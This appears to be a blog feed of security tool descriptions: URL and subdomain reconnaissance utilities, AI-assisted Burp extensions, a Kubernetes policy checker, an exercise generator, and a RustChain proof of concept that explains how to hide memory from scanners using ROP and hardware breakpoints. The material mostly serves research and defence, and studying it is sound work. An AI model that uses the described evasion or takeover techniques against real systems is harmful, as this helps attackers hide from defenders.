    ++RCVD++ (204 Plaintext OK) www.example.com @ :::8443
    ++RCVD++ (202 OK) www.example.com @ :::8444
    ++RCVD++ (200 OK) www.example.com @ ::1:8001
    ++RCVD++ (204 Plaintext OK) www.example.com @ ::1:8443
    ++RCVD++ (202 OK) www.example.com @ ::1:8444
    ++RCVD++ (200 OK) www.example.com @ 127.0.0.1:8001
    ++RCVD++ (204 Plaintext OK) www.example.com @ 127.0.0.1:8443
    ++RCVD++ (202 OK) www.example.com @ 127.0.0.1:8444
    ++RCVD++ (200 OK) localhost.example.com @ :::8001
    ++RCVD++ (204 Plaintext OK) localhost.example.com @ :::8443
    ++RCVD++ (202 OK) localhost.example.com @ :::8444
    ++RCVD++ (200 OK) localhost.example.com @ ::1:8001
    ++RCVD++ (204 Plaintext OK) localhost.example.com @ ::1:8443
    ++RCVD++ (202 OK) localhost.example.com @ ::1:8444
    ++RCVD++ (200 OK) localhost.example.com @ 127.0.0.1:8001
    ++RCVD++ (204 Plaintext OK) localhost.example.com @ 127.0.0.1:8443
    ++RCVD++ (202 OK) localhost.example.com @ 127.0.0.1:8444
    Origin Scan: 100%|β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 18/18 [00:06<00:00, 2.76it/s]
    2023-06-21 12:49:09 [RSLT] Results from 5 FQDNs:
    ::1
    ::1:8444 => (202 / OK)
    ::1:8443 => (204 / Plaintext OK)
    ::1:8001 => (200 / OK)

    127.0.0.1
    127.0.0.1:8001 => (200 / OK)
    127.0.0.1:8443 => (204 / Plaintext OK)
    127.0.0.1:8444 => (202 / OK)

    ::
    :::8001 => (200 / OK)
    :::8443 => (204 / Plaintext OK)
    :::8444 => (202 / OK)

    www.example.com
    :::8001 => (200 / OK)
    :::8443 => (204 / Plaintext OK)
    :::8444 => (202 / OK)
    ::1:8001 => (200 / OK)
    ::1:8443 => (204 / Plaintext OK)
    ::1:8444 => (202 / OK)
    127.0.0.1:8001 => (200 / OK)
    127.0.0.1:8443 => (204 / Plaintext OK)
    127.0.0.1:8444 => (202 / OK)

    localhost.example.com
    :::8001 => (200 / OK)
    :::8443 => (204 / Plaintext OK)
    :::8444 => (202 / OK)
    ::1:8001 => (200 / OK)
    ::1:8443 => (204 / Plaintext OK)
    ::1:8444 => (202 / OK)
    127.0.0.1:8001 => (200 / OK)
    127.0.0.1:8443 => (204 / Plaintext OK)
    127.0.0.1:8444 => (202 / OK)


    rst@r57 chaos %

    Test & Verbose localhost

    -T runs in test mode (do everything except send requests)

    -v verbose option provides additional output


    Known Defects

    • HTTP/HTTPS detection is not ideal
    • Need option to adjust CSV newline delimiter
    • Need options to adjust where long strings / many lines are truncated
    • Try to figure out why we marked requests v2.x as required ;)
    • Options for very-verbose / quiet
    • Stagger thread launch when we're using sleep / jitter
    • Search for meta-refresh in 200 responses
    • Content-Location header for 201s ?
    • Improve thread name generation so we have the right number of unique names
    • Sanity check on IPv6 netmasks to prevent scans that outlive the sun?
    • TBD?

    Related Links

    Disclaimers

    • Copyright (C) 2023 RST
    • This software is distributed on an "AS IS" basis, without express or implied warranties of any kind
    • This software is intended for research and/or authorized testing; it is your responsibility to ensure you are authorized to use this software in any way
    • By using this software you acknowledge that you are responsible for your actions and assume all liability for any direct, indirect, or other damages


    Xurlfind3R - A CLI Utility To Find Domain'S Known URLs From Curated Passive Online Sources

    By: Zion3R


    xurlfind3r is a command-line interface (CLI) utility to find domain's known URLs from curated passive online sources.


    Features

    Installation

    Install release binaries (Without Go Installed)

    Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

    • ...with wget:

       wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
    • ...or, with curl:

       curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz

    ...then, extract the binary:

    tar xf xurlfind3r-<version>-linux-amd64.tar.gz

    TIP: The above steps, download and extract, can be combined into a single step with this one-liner:

    curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv

    NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r executable.

    ...move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

    sudo mv xurlfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

    Install source (With Go Installed)

    Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

    go install ...

    go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latest

    go build ... the development Version

    • Clone the repository

       git clone https://github.com/hueristiq/xurlfind3r.git 
    • Build the utility

       cd xurlfind3r/cmd/xurlfind3r && \
      go build .
    • Move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

       sudo mv xurlfind3r /usr/local/bin/

      NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

    NOTE: While the development version is a good way to take a peek at xurlfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

    Post Installation

    xurlfind3r will work right after installation. However, BeVigil, Github and Intelligence X require API keys, while URLScan supports an API key but does not require one. API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml file, which is created on first run and uses the YAML format. Multiple API keys can be specified for each of these sources, and one of them will be used.

    Example config.yaml:

    version: 0.2.0
    sources:
      - bevigil
      - commoncrawl
      - github
      - intelx
      - otx
      - urlscan
      - wayback
    keys:
      bevigil:
        - awA5nvpKU3N8ygkZ
      github:
        - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
        - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
      intelx:
        - 2.intelx.io:00000000-0000-0000-0000-000000000000
      urlscan:
        - d4c85d34-e425-446e-d4ab-f5a3412acbe8

    Usage

    To display help message for xurlfind3r use the -h flag:

    xurlfind3r -h

    help message:

                     _  __ _           _ _____      
    __ ___ _ _ __| |/ _(_)_ __ __| |___ / _ __
    \ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
    > <| |_| | | | | _| | | | | (_| |___) | |
    /_/\_\\__,_|_| |_|_| |_|_| |_|\__,_|____/|_| v0.2.0

    USAGE:
    xurlfind3r [OPTIONS]

    TARGET:
    -d, --domain string (sub)domain to match URLs

    SCOPE:
    --include-subdomains bool match subdomain's URLs

    SOURCES:
    -s, --sources bool list sources
    -u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
    --skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
    --skip-wayback-source bool with wayback, skip parsing source code snapshots

    FILTER & MATCH:
    -f, --filter string regex to filter URLs
    -m, --match string regex to match URLs

    OUTPUT:
    --no-color bool no color mode
    -o, --output string output URLs file path
    -v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

    CONFIGURATION:
    -c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)

    Examples

    Basic

    xurlfind3r -d hackerone.com --include-subdomains

    Filter Regex

    # filter images
    xurlfind3r -d hackerone.com --include-subdomains -f '^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$'

    Match Regex

    # match js URLs
    xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'

    Contributing

    Issues and Pull Requests are welcome! Check out the contribution guidelines.

    Licensing

    This utility is distributed under the MIT license.



    AiCEF - An AI-assisted cyber exercise content generation framework using named entity recognition

    By: Zion3R


    AiCEF is a tool implementing the accompanying framework [1] in order to harness the intelligence available from online resources, as well as threat groups' activities and arsenal (e.g. MITRE), to create relevant and timely cybersecurity exercise content. This way, we abstract the events from the reports in a machine-readable form. The produced graphs can be infused with additional intelligence, e.g. the threat actor profile from MITRE, also mapped in our ontology. While this may fill gaps that would be missing from a report, one can also manipulate the graph to create custom and unique models. Finally, we exploit transformer-based language models like GPT to convert the graph into text that can serve as the scenario of a cybersecurity exercise. We have tested and validated AiCEF with a group of experts in cybersecurity exercises, and the results clearly show that AiCEF significantly augments the capabilities in creating timely and relevant cybersecurity exercises in terms of both quality and time.

    We used Python to create a machine-learning-powered Exercise Generation Framework and developed a set of tools that perform the individual tasks which help an exercise planner (EP) create a timely and targeted Cybersecurity Exercise Scenario, regardless of their experience.


    Problems an Exercise Planner faces:

    • Constant table-top research to have fresh content
    • Realistic CSE scenario creation can be difficult and time-consuming
    • Meeting objectives but also keeping it appealing for the target audience
    • Are the relevance and timeliness aspects considered?
    • Can all the above be automated?

    Our Main Objective: Build an AI powered tool that can generate relevant and up-to-date Cyber Exercise Content in a few steps with little technical expertise from the user.

    Release Roadmap

    The updated project, AiCEF v2.0, is planned to be publicly released by the end of 2023, pending heavy code review and functionality updates. Submodules with reduced functionality will start being released by early June 2023. Thank you for your patience.

    Installation

    The most convenient way to install AiCEF is by using the docker-compose command. For production deployment, we advise you to deploy MySQL manually in a dedicated environment and then start the other components using Docker.

    First, make sure you have docker-compose installed in your environment:

    
    Linux:

    $ sudo apt-get install docker-compose

    Then, clone the repository:

    $ git clone https://github.com/grazvan/AiCEF/docker.git /<choose-a-path>/AiCEF-docker
    $ cd /<choose-a-path>/AiCEF-docker

    Configure the environment settings

    Import the MySQL file into your database:

    $ mysql -u <your_username> --password=<your_password> AiCEF_db < AiCEF_db.sql

    Before running the docker-compose command, settings must be configured. Copy the sample settings file and change it accordingly to your needs.

    $ cp .env.sample .env

    Run AiCEF

    Note: Make sure you have an OpenAI API key available. Load the environment settings (including your MySQL connection details):

    set -a ; source .env

    Finally, run docker-compose in detached (-d) mode:

    $ sudo docker-compose up -d

    Usage

    A common usage flow consists of generating a Trend Report to analyze patterns over time, parsing relevant articles and converting them into Incident Breadcrumbs using MLTP module and storing them in a knowledge database called KDb. Incidents are then generated using IncGen component and can be enhanced using the Graph Enhancer module to simulate known APT activity. The incidents come with injects that can be edited on the fly. The CSE scenario is then created using CEGen, which defines various attributes like CSE name, number of Events, and Incidents. MLCESO is a crucial step in the methodology where dedicated ML models are trained to extract information from the collected articles with over 80% accuracy. The Incident Generation & Enhancer (IncGen) workflow can be automated, generating a variety of incidents based on filtering parameters and the existing database. The knowledge database (KDB) consists of almost 3000 articles classified into six categories that can be augmented using APT Enhancer by using the activity of known APT groups from MITRE or manually.

    Find below some sample usage screenshots:

    Features

    • An AI-powered Cyber Exercise Generation Framework
    • Developed in Python & EEL
    • Open source library Stixview
    • Stores data in MYSQL
    • API to Text Synthesis Models (ex. GPT-3.5)
    • Can create incidents based on TTPs of 125 known APT actors
    • Models Cyber Exercise Content in machine readable STIX2.1 [2] (.json) and human readable format (.pdf)

    Authors

    AiCEF is a product designed and developed by Alex Zacharis, Razvan Gavrila and Constantinos Patsakis.

    References

    [1] https://link.springer.com/article/10.1007/s10207-023-00693-z

    [2] https://oasis-open.github.io/cti-documentation/stix/intro.html

    Contributing

    Contributions are welcome! If you'd like to contribute to AiCEF v2.0, please follow these steps:

    1. Fork this repository
    2. Create a new branch (git checkout -b feature/your-branch-name)
    3. Make your changes and commit them (git commit -m 'Add some feature')
    4. Push to the branch (git push origin feature/your-branch-name)
    5. Open a new pull request

    License

    AiCEF is licensed under Attribution-NonCommercial 4.0 International (CC BY-NC 4.0) license. See for more information.

    Under the following terms:

    • Attribution: You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.
    • NonCommercial: You may not use the material for commercial purposes.
    • No additional restrictions: You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.



    Polaris - Validation Of Best Practices In Your Kubernetes Clusters

    By: Zion3R


    Polaris is an open source policy engine for Kubernetes that validates and remediates resource configuration. It includes 30+ built-in configuration policies, as well as the ability to build custom policies with JSON Schema. When run on the command line or as a mutating webhook, Polaris can automatically remediate issues based on policy criteria.

    Polaris can be run in three different modes:

    • As a dashboard - Validate Kubernetes resources against policy-as-code.
    • As an admission controller - Automatically reject or modify workloads that don't adhere to your organization's policies.
    • As a command-line tool - Incorporate policy-as-code into the CI/CD process to test local YAML files.


    Documentation

    Check out the documentation at docs.fairwinds.com

    Join the Fairwinds Open Source Community

    The goal of the Fairwinds Community is to exchange ideas, influence the open source roadmap, and network with fellow Kubernetes users. Chat with us on Slack or join the user group to get involved!

    Other Projects from Fairwinds

    Enjoying Polaris? Check out some of our other projects:

    • Goldilocks - Right-size your Kubernetes Deployments by comparing your memory and CPU settings against actual usage
    • Pluto - Detect Kubernetes resources that have been deprecated or removed in future versions
    • Nova - Check to see if any of your Helm charts have updates available
    • rbac-manager - Simplify the management of RBAC in your Kubernetes clusters

    Or check out the full list

    Fairwinds Insights

    If you're interested in running Polaris in multiple clusters, tracking the results over time, integrating with Slack, Datadog, and Jira, or unlocking other functionality, check out Fairwinds Insights, a platform for auditing and enforcing policy in Kubernetes clusters.



    Artemis - A Modular Web Reconnaissance Tool And Vulnerability Scanner

    By: Zion3R


    A modular web reconnaissance tool and vulnerability scanner based on Karton (https://github.com/CERT-Polska/karton).

    The Artemis project has been initiated by the KN Cyber science club of Warsaw University of Technology and is currently being maintained by CERT Polska.

    Artemis is experimental software, under active development - use at your own risk.

    Features

    For an up-to-date list of features, please refer to the documentation.

    Development

    Tests

    To run the tests, use:

    ./scripts/test

    Code formatting

    Artemis uses pre-commit to run linters and format the code. pre-commit is executed on CI to verify that the code is formatted properly.

    To run it locally, use:

    pre-commit run --all-files

    To setup pre-commit so that it runs before each commit, use:

    pre-commit install

    Building the docs

    To build the documentation, use:

    cd docs
    python3 -m venv venv
    . venv/bin/activate
    pip install -r requirements.txt
    make html

    How do I write my own module?

    Please refer to the documentation.

    Contributing

    Contributions are welcome! We will appreciate both ideas for new Artemis modules (added as GitHub issues) as well as pull requests with new modules or code improvements.

    However obvious it may seem, we kindly remind you that by contributing to Artemis you agree that the BSD 3-Clause License shall apply to your input automatically, without the need for any additional declarations to be made.



    ReconAIzer - A Burp Suite Extension To Add OpenAI (GPT) On Burp And Help You With Your Bug Bounty Recon To Discover Endpoints, Params, URLs, Subdomains And More!

    By: Zion3R


    ReconAIzer is a powerful Jython extension for Burp Suite that leverages OpenAI to help bug bounty hunters optimize their recon process. This extension automates various tasks, making it easier and faster for security researchers to identify and exploit vulnerabilities.

    Once installed, ReconAIzer adds a contextual menu and a dedicated tab to see the results:


    Prerequisites

    • Burp Suite
    • Jython Standalone Jar

    Installation

    Follow these steps to install the ReconAIzer extension on Burp Suite:

    Step 1: Download Jython

    1. Download the latest Jython Standalone Jar from the official website: https://www.jython.org/download
    2. Save the Jython Standalone Jar file in a convenient location on your computer.

    Step 2: Configure Jython in Burp Suite

    1. Open Burp Suite.
    2. Go to the "Extensions" tab.
    3. Click on the "Extensions settings" sub-tab.
    4. Under "Python Environment," click on the "Select file..." button next to "Location of the Jython standalone JAR file."
    5. Browse to the location where you saved the Jython Standalone Jar file in Step 1 and select it.
    6. Wait for the "Python Environment" status to change to "Jython (version x.x.x) successfully loaded," where x.x.x represents the Jython version.

    Step 3: Download and Install ReconAIzer

    1. Download the latest release of ReconAIzer
    2. Open Burp Suite
    3. Go back to the "Extensions" tab in Burp Suite.
    4. Click the "Add" button.
    5. In the "Add extension" dialog, select "Python" as the "Extension type."
    6. Click on the "Select file..." button next to "Extension file" and browse to the location where you saved the ReconAIzer.py file in Step 3.1. Select the file and click "Open."
    7. Make sure the "Load" checkbox is selected and click the "Next" button.
    8. Wait for the extension to be loaded. You should see a message in the "Output" section stating that the ReconAIzer extension has been successfully loaded.

    Congratulations! You have successfully installed the ReconAIzer extension in Burp Suite. You can now start using it to enhance your bug bounty hunting experience.

    Once it's done, you must configure your OpenAI API key on the "Config" tab under the "ReconAIzer" tab.

    Feel free to suggest prompts improvements or anything you would like to see on ReconAIzer!

    Happy bug hunting!



    Burpgpt - A Burp Suite Extension That Integrates OpenAI's GPT To Perform An Additional Passive Scan For Discovering Highly Bespoke Vulnerabilities, And Enables Running Traffic-Based Analysis Of Any Type

    By: Zion3R


    burpgpt leverages the power of AI to detect security vulnerabilities that traditional scanners might miss. It sends web traffic to an OpenAI model specified by the user, enabling sophisticated analysis within the passive scanner. This extension offers customisable prompts that enable tailored web traffic analysis to meet the specific needs of each user. Check out the Example Use Cases section for inspiration.

    The extension generates an automated security report that summarises potential security issues based on the user's prompt and real-time data from Burp-issued requests. By leveraging AI and natural language processing, the extension streamlines the security assessment process and provides security professionals with a higher-level overview of the scanned application or endpoint. This enables them to more easily identify potential security issues and prioritise their analysis, while also covering a larger potential attack surface.

    [!WARNING] Data traffic is sent to OpenAI for analysis. If you have concerns about this or are using the extension for security-critical applications, it is important to carefully consider this and review OpenAI's Privacy Policy for further information.

    [!WARNING] While the report is automated, it still requires triaging and post-processing by security professionals, as it may contain false positives.

    [!WARNING] The effectiveness of this extension is heavily reliant on the quality and precision of the prompts created by the user for the selected GPT model. This targeted approach will help ensure the GPT model generates accurate and valuable results for your security analysis.


    Features

    • Adds a passive scan check, allowing users to submit HTTP data to an OpenAI-controlled GPT model for analysis through a placeholder system.
    • Leverages the power of OpenAI's GPT models to conduct comprehensive traffic analysis, enabling detection of various issues beyond just security vulnerabilities in scanned applications.
    • Enables granular control over the number of GPT tokens used in the analysis by allowing for precise adjustments of the maximum prompt length.
    • Offers users multiple OpenAI models to choose from, allowing them to select the one that best suits their needs.
    • Empowers users to customise prompts and unleash limitless possibilities for interacting with OpenAI models. Browse through the Example Use Cases for inspiration.
    • Integrates with Burp Suite, providing all native features for pre- and post-processing, including displaying analysis results directly within the Burp UI for efficient analysis.
    • Provides troubleshooting functionality via the native Burp Event Log, enabling users to quickly resolve communication issues with the OpenAI API.

    Requirements

    1. System requirements:
    • Operating System: Compatible with Linux, macOS, and Windows operating systems.

    • Java Development Kit (JDK): Version 11 or later.

    • Burp Suite Professional or Community Edition: Version 2023.3.2 or later.

      [!IMPORTANT] Please note that using any version lower than 2023.3.2 may result in a java.lang.NoSuchMethodError. It is crucial to use the specified version or a more recent one to avoid this issue.

2. Build tool:
    • Gradle: Version 6.9 or later (recommended). The build.gradle file is provided in the project repository.
3. Environment variables:
    • Set up the JAVA_HOME environment variable to point to the JDK installation directory.

    Please ensure that all system requirements, including a compatible version of Burp Suite, are met before building and running the project. Note that the project's external dependencies will be automatically managed and installed by Gradle during the build process. Adhering to the requirements will help avoid potential issues and reduce the need for opening new issues in the project repository.

    Installation

    1. Compilation

    1. Ensure you have Gradle installed and configured.

    2. Download the burpgpt repository:

      git clone https://github.com/aress31/burpgpt
      cd .\burpgpt\
    3. Build the standalone jar:

      ./gradlew shadowJar

    2. Loading the Extension Into Burp Suite

    To install burpgpt in Burp Suite, first go to the Extensions tab and click on the Add button. Then, select the burpgpt-all jar file located in the .\lib\build\libs folder to load the extension.

    Usage

    To start using burpgpt, users need to complete the following steps in the Settings panel, which can be accessed from the Burp Suite menu bar:

    1. Enter a valid OpenAI API key.
    2. Select a model.
    3. Define the max prompt size. This field controls the maximum prompt length sent to OpenAI to avoid exceeding the maxTokens of GPT models (typically around 2048 for GPT-3).
    4. Adjust or create custom prompts according to your requirements.

    Once configured as outlined above, the Burp passive scanner sends each request to the chosen OpenAI model via the OpenAI API for analysis, producing Informational-level severity findings based on the results.

    Prompt Configuration

    burpgpt enables users to tailor the prompt for traffic analysis using a placeholder system. To include relevant information, we recommend using these placeholders, which the extension handles directly, allowing dynamic insertion of specific values into the prompt:

    Placeholder Description
    {REQUEST} The scanned request.
    {URL} The URL of the scanned request.
    {METHOD} The HTTP request method used in the scanned request.
    {REQUEST_HEADERS} The headers of the scanned request.
    {REQUEST_BODY} The body of the scanned request.
    {RESPONSE} The scanned response.
    {RESPONSE_HEADERS} The headers of the scanned response.
    {RESPONSE_BODY} The body of the scanned response.
    {IS_TRUNCATED_PROMPT} A boolean value that is programmatically set to true or false to indicate whether the prompt was truncated to the Maximum Prompt Size defined in the Settings.

    These placeholders can be used in the custom prompt to dynamically generate a request/response analysis prompt that is specific to the scanned request.
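To make the mechanism concrete, here is a minimal Python sketch of how such a placeholder system could behave, assuming hypothetical raw request/response strings and a simplified truncation rule; the actual extension implements this internally in Java inside Burp Suite.

# Minimal sketch of a placeholder-substitution scheme like the one described
# above. Names and the truncation rule are illustrative assumptions, not the
# extension's actual implementation.
MAX_PROMPT_SIZE = 2048  # mirrors the "Maximum Prompt Size" setting

def build_prompt(template, request, response, url, method):
    values = {
        "{REQUEST}": request,
        "{URL}": url,
        "{METHOD}": method,
        "{REQUEST_HEADERS}": request.split("\r\n\r\n", 1)[0],
        "{REQUEST_BODY}": request.split("\r\n\r\n", 1)[-1],
        "{RESPONSE}": response,
        "{RESPONSE_HEADERS}": response.split("\r\n\r\n", 1)[0],
        "{RESPONSE_BODY}": response.split("\r\n\r\n", 1)[-1],
    }
    prompt = template
    for placeholder, value in values.items():
        prompt = prompt.replace(placeholder, value)
    truncated = len(prompt) > MAX_PROMPT_SIZE
    prompt = prompt[:MAX_PROMPT_SIZE]
    # resolve {IS_TRUNCATED_PROMPT} last so it reflects the final prompt state
    return prompt.replace("{IS_TRUNCATED_PROMPT}", str(truncated).lower())

template = "Analyse {METHOD} {URL} for issues.\nHeaders: {REQUEST_HEADERS}\nTruncated: {IS_TRUNCATED_PROMPT}"
request = "GET /login HTTP/1.1\r\nHost: example.com\r\n\r\n"
response = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>"
print(build_prompt(template, request, response, "https://example.com/login", "GET"))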

[!NOTE] Burp Suite provides the capability to support arbitrary placeholders through the use of Session handling rules or extensions such as Custom Parameter Handler, allowing for even greater customisation of the prompts.

    Example Use Cases

    The following list of example use cases showcases the bespoke and highly customisable nature of burpgpt, which enables users to tailor their web traffic analysis to meet their specific needs.

    • Identifying potential vulnerabilities in web applications that use a crypto library affected by a specific CVE:

      Analyse the request and response data for potential security vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER}:

      Web Application URL: {URL}
      Crypto Library Name: {CRYPTO_LIBRARY_NAME}
      CVE Number: CVE-{CVE_NUMBER}
      Request Headers: {REQUEST_HEADERS}
      Response Headers: {RESPONSE_HEADERS}
      Request Body: {REQUEST_BODY}
      Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities related to the {CRYPTO_LIBRARY_NAME} crypto library affected by CVE-{CVE_NUMBER} in the request and response data and report them.
    • Scanning for vulnerabilities in web applications that use biometric authentication by analysing request and response data related to the authentication process:

      Analyse the request and response data for potential security vulnerabilities related to the biometric authentication process:

      Web Application URL: {URL}
      Biometric Authentication Request Headers: {REQUEST_HEADERS}
      Biometric Authentication Response Headers: {RESPONSE_HEADERS}
      Biometric Authentication Request Body: {REQUEST_BODY}
      Biometric Authentication Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities related to the biometric authentication process in the request and response data and report them.
    • Analysing the request and response data exchanged between serverless functions for potential security vulnerabilities:

      Analyse the request and response data exchanged between serverless functions for potential security vulnerabilities:

      Serverless Function A URL: {URL}
      Serverless Function B URL: {URL}
      Serverless Function A Request Headers: {REQUEST_HEADERS}
      Serverless Function B Response Headers: {RESPONSE_HEADERS}
      Serverless Function A Request Body: {REQUEST_BODY}
      Serverless Function B Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities in the data exchanged between the two serverless functions and report them.
    • Analysing the request and response data for potential security vulnerabilities specific to a Single-Page Application (SPA) framework:

      Analyse the request and response data for potential security vulnerabilities specific to the {SPA_FRAMEWORK_NAME} SPA framework:

      Web Application URL: {URL}
      SPA Framework Name: {SPA_FRAMEWORK_NAME}
      Request Headers: {REQUEST_HEADERS}
      Response Headers: {RESPONSE_HEADERS}
      Request Body: {REQUEST_BODY}
      Response Body: {RESPONSE_BODY}

      Identify any potential vulnerabilities related to the {SPA_FRAMEWORK_NAME} SPA framework in the request and response data and report them.

    Roadmap

    • Add a new field to the Settings panel that allows users to set the maxTokens limit for requests, thereby limiting the request size.
    • Add support for connecting to a local instance of the AI model, allowing users to run and interact with the model on their local machines, potentially improving response times and data privacy.
    • Retrieve the precise maxTokens value for each model to transmit the maximum allowable data and obtain the most extensive GPT response possible.
    • Implement persistent configuration storage to preserve settings across Burp Suite restarts.
    • Enhance the code for accurate parsing of GPT responses into the Vulnerability model for improved reporting.

    Project Information

    The extension is currently under development and we welcome feedback, comments, and contributions to make it even better.

    Sponsor

If this extension has saved you time and hassle during a security assessment, consider showing some love by sponsoring a cup of coffee for the developer. It's the fuel that powers development, after all. Just hit that shiny Sponsor button at the top of the page or click here to contribute and keep the caffeine flowing.

    Reporting Issues

    Did you find a bug? Well, don't just let it crawl around! Let's squash it together like a couple of bug whisperers!

    Please report any issues on the GitHub issues tracker. Together, we'll make this extension as reliable as a cockroach surviving a nuclear apocalypse!

    Contributing

    Looking to make a splash with your mad coding skills?

    Awesome! Contributions are welcome and greatly appreciated. Please submit all PRs on the GitHub pull requests tracker. Together we can make this extension even more amazing!

    License

    See LICENSE.



    RustChain - Hide Memory Artifacts Using ROP And Hardware Breakpoints

    By: Zion3R


    This tool is a simple PoC of how to hide memory artifacts using a ROP chain in combination with hardware breakpoints. The ROP chain will change the main module memory page's protections to N/A while sleeping (i.e. when the function Sleep is called). For more detailed information about this memory scanning evasion technique check out the original project Gargoyle. x64 only.

The idea is to set up a hardware breakpoint on kernel32!Sleep and a new top-level exception filter to handle the exception. When Sleep is called, the previously registered exception filter function is triggered, allowing us to call the ROP chain without needing classic function hooks. This way, we avoid leaving weird and unusual private memory regions in the process related to well-known DLLs.

    The ROP chain simply calls VirtualProtect() to set the current memory page to N/A, then calls SleepEx and finally restores the RX memory protection.


    The overview of the process is as follows:

    • We use SetUnhandledExceptionFilter to set a new exception filter function.
    • SetThreadContext is used in order to set a hardware breakpoint on kernel32!Sleep.
    • We call Sleep, triggering the hardware breakpoint and driving the execution flow towards our exception filter function.
• The ROP chain is called from the exception filter function, allowing us to change the current memory page protection to N/A. Then SleepEx is called. Finally, the ROP chain restores the RX memory protection and normal execution continues.

    This process repeats indefinitely.

The result is that the main module's memory protection is changed to N/A while sleeping, which defeats memory scans looking for pages with execution permission.
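For readers who want to see the core protect/sleep/restore sequence in isolation, here is a rough Python (ctypes) sketch that performs it on a throwaway buffer. It only illustrates the Win32 calls involved; it is not the ROP chain or the hardware-breakpoint setup the tool actually uses, and it assumes a Windows host.

# Illustration only: the protect -> sleep -> restore sequence performed by the
# ROP chain, demonstrated on a dummy page instead of the main module.
import ctypes
import time

kernel32 = ctypes.windll.kernel32
kernel32.VirtualAlloc.restype = ctypes.c_void_p

MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_READWRITE = 0x04
PAGE_NOACCESS = 0x01
PAGE_EXECUTE_READ = 0x20

size = 0x1000
# a single page standing in for the module region the ROP chain protects
buf = kernel32.VirtualAlloc(None, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)
old = ctypes.c_ulong(0)

# 1) drop the page to N/A so memory scans find nothing readable or executable
kernel32.VirtualProtect(ctypes.c_void_p(buf), size, PAGE_NOACCESS, ctypes.byref(old))
# 2) sleep while the region is inaccessible (the tool calls SleepEx here)
time.sleep(2)
# 3) restore RX and continue normal execution
kernel32.VirtualProtect(ctypes.c_void_p(buf), size, PAGE_EXECUTE_READ, ctypes.byref(old))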

    Compilation

    Since we are using LITCRYPT plugin to obfuscate string literals, it is required to set up the environment variable LITCRYPT_ENCRYPT_KEY before compiling the code:

    C:\Users\User\Desktop\RustChain> set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"

    After that, simply compile the code and run the tool:

    C:\Users\User\Desktop\RustChain> cargo build
    C:\Users\User\Desktop\RustChain\target\debug> rustchain.exe

    Limitations

    This tool is just a PoC and some extra features should be implemented in order to be fully functional. The main purpose of the project was to learn how to implement a ROP chain and integrate it within Rust. Because of that, this tool will only work if you use it as it is, and failures are expected if you try to use it in other ways (for example, compiling it to a dll and trying to reflectively load and execute it).

    Credits



    Domain-Protect - OWASP Domain Protect - Prevent Subdomain Takeover

    By: Zion3R

    OWASP Global AppSec Dublin - talk and demo


    Features

    • scan Amazon Route53 across an AWS Organization for domain records vulnerable to takeover
    • scan Cloudflare for vulnerable DNS records
    • take over vulnerable subdomains yourself before attackers and bug bounty researchers
    • automatically create known issues in Bugcrowd or HackerOne
    • vulnerable domains in Google Cloud DNS can be detected by Domain Protect for GCP
    • manual scans of cloud accounts with no installation

    Installation

    Collaboration

    We welcome collaborators! Please see the OWASP Domain Protect website for more details.

    Documentation

    Manual scans - AWS
    Manual scans - CloudFlare
    Architecture
    Database
    Reports
    Automated takeover optional feature
    Cloudflare optional feature
    Bugcrowd optional feature
    HackerOne optional feature
    Vulnerability types
    Vulnerable A records (IP addresses) optional feature
    Requirements
    Installation
    Slack Webhooks
    AWS IAM policies
    CI/CD
    Development
    Code Standards
    Automated Tests
    Manual Tests
    Conference Talks and Blog Posts

    Limitations

    This tool cannot guarantee 100% protection against subdomain takeovers.



    Sh4D0Wup - Signing-key Abuse And Update Exploitation Framework


    Signing-key abuse and update exploitation framework.

    % docker run -it --rm ghcr.io/kpcyrd/sh4d0wup:edge -h
    Usage: sh4d0wup [OPTIONS] <COMMAND>

    Commands:
